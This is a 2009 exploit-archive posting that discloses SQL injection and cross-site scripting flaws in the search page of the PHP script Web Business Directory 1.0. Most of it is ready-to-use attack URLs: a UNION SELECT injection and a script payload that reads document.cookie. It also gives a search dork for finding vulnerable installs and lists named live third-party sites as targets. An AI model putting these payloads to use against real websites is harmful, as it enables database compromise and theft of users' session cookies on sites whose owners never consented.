[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : phpDirectorySource (XSS/SQL) Multiple Remote Vulnerabilities
# Published : 2009-07-21
# Author : Moudi
# Previous Title : AnotherPHPBook (APB) v.1.3.0 (Auth Bypass) SQL Injection Vulnerability
# Next Title : Meta Search Engine Script (url) Local File Disclosure Vulnerability
==============================================================================
[??] [!] Coder - Developer HTML / CSS / PHP / Vb6 . [!]
==============================================================================
[??] Web Business Directory 1.0 (search.php) Multiple Remote Vulnerabilities
==============================================================================
[??] Script: [ Web Business Directory 1.0 ]
[??] Language: [ PHP ]
[??] Download: [ http://www.phpdirectorysource.com/ ]
[??] Founder: [ Moudi <m0udi@9.cn> ]
[??] Thanks to: [ MiZoZ , ZuKa , str0ke , 599em Man , Security-Shell ...]
[??] Team: [ EvilWay ]
[??] Dork: [ Copyright 2005-2006 phpDirectorySourcea?¢, all rights reserved ]
[??] Price: [ $75.00 ]
[??] Site : [ https://security-shell.ws/forum.php ]
###########################################################################
===[ Exploit SQL INJECTION + LIVE : vulnerability ]===
[??] http://www.site.com/patch/search.php?sa=site&sk=a&nl=11&st=
[??] http://www.phpdirectorysource.com/directory/search.php?sa=site&sk=a&nl=11&st=XX' union select version()/*
[??] http://ilovealbertaoil.com/search.php?sa=site&sk=a&nl=11&st=XX' union select version()/*
===[ Exploit XSS + LIVE : vulnerability ]===
[??] http://www.site.com/patch/search.php?sa=site&sk=a&nl=11&st=
[??] http://www.phpdirectorysource.com/directory/search.php?sa=site&sk=a&nl=11&st="><script>alert(document.cookie);</script>
[??] http://ilovealbertaoil.com/search.php?sa=site&sk=a&nl=11&st="><script>alert(document.cookie);</script>
Author: Moudi
###########################################################################
# www.Syue.com [2009-07-21]